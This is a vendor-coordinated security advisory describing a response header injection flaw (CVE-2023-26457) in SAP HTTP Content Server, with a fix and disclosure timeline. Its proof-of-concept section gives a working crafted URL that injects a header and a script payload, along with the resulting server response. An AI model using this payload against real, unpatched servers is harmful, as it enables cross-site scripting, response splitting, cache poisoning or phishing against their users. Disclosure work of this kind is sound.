usd-2022-0046 | Response Header Injection in SAP HTTP Content Server
Advisory ID: usd-2022-0046
Affected Product: SAP HTTP Content Server
Affected Version: Server Version 753 running Patch 1028, Build Version Auf 12 2022 (N)
Vulnerability Type: Improper Neutralization of HTTP Headers for Scripting Syntax (CWE-644)
Security Risk: HIGH
Vendor URL: https://www.sap.com/germany/index.html
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed - for more details see References below
CVE Link: CVE-2023-26457
Description
The SAP HTTP Content Server returns error messages in the header x-errordescription of the HTTP Response.
When invalid input is provided in a HTTP request, it is also placed in the error message inside this header.
During this process the input is URL-decoded, therefore for example %41 is translated to A and %0a is translated to a newline.
This enables an attacker to add new headers and change the content of the response.
Proof of Concept
The following URL provides an invalid value for the parameter pVersion which then is inserted in the x-errordescription header:
[http://<IP>:1090/sapcs?create&pVersion=%0aContent-type%3atext/html%0a%0a<script>alert("usd%20AG")</script>]()
The part %0aContent-type%3atext/html adds a new header to the response and sets the content type to text/html instead of the original text/plain.
This causes browsers to interpret HTML tags in the response.
The next part %0a%0aalert("usd%20AG") ends the header section of the response and adds an JavaScript payload to the body of the response.
The complete HTTP response to this URL is as follows:
HTTP/1.1 400 Bad Request
x-servertype: SAP HTTP Content Server 7.53/1028/N
x-errordescription: Unsupported protocol version:
content-type:text/html <script>alert("usd AG")</script> Content-type: text/plain X-Query: create&pVersion=%0aContent-type%3atext/html%0a%0a<script>alert("usd%20AG")</script> X-ServerDate: 2022-09-15 X-ServerId: server=<redacted> Content-length: 452 X-ServerTime: 12:53:46 X-Status: 400 X-pVersion: Content-type:text/html <script>alert("usd AG")</script> X-ServerType: SAP HTTP Content Server 7.53/1028/N X-ErrorDescription: Unsupported protocol version: Content-type:text/html <script>alert("usd AG")</script> X-Query: create&pVersion=%0aContent-type%3atext/html%0a%0a<script>alert("usd%20AG")</script> X-ServerDate: 2022-09-15 X-ServerId: server=<redacted> X-ServerTime: 12:53:46 X-Status: 400 X-pVersion: Content-type:text/html <script>alert("usd AG")</script>
This Cross-Site-Scripting attack is only one possibility for exploiting the underlying vulnerability. Attackers could also use it to carry out response splitting or cache poisoning attacks, or to conduct a phishing campaign.
Fix
It is recommended to perform output validation in order to filter/escape/encode unsafe data that is being passed from the server in an HTTP response header.
For details on SAP's fix see https://launchpad.support.sap.com/#/notes/3281484.
References
https://launchpad.support.sap.com/#/notes/3281484
https://www.sap.com/documents/2022/02089613a0-167e-0010-bca6-c68f7e60039b.html
https://cwe.mitre.org/data/definitions/644.html
https://capec.mitre.org/data/definitions/34.html
https://cwe.mitre.org/data/definitions/113.html
Timeline
- 2022-09-15: The vulnerability was identified by Nicolas Schickert.
- 2022-11-10: The responsible disclosure team sent the first contact request via https://www.sap.com/about/trust-center/security/incident-management.html .
- 2023-02-14: SAP reports that vulnerability was addressed.
- 2023-03-14: Vendor notice and patch goes out to customers, the vulnerability can be disclosed after an appropriate grace-period has passed.
- 2023-09-25: Security advisory released by usd AG.
Credits
This security vulnerability was identified by Nicolas Schickert of usd AG.
He has been credited by SAP for his research in June of 2023.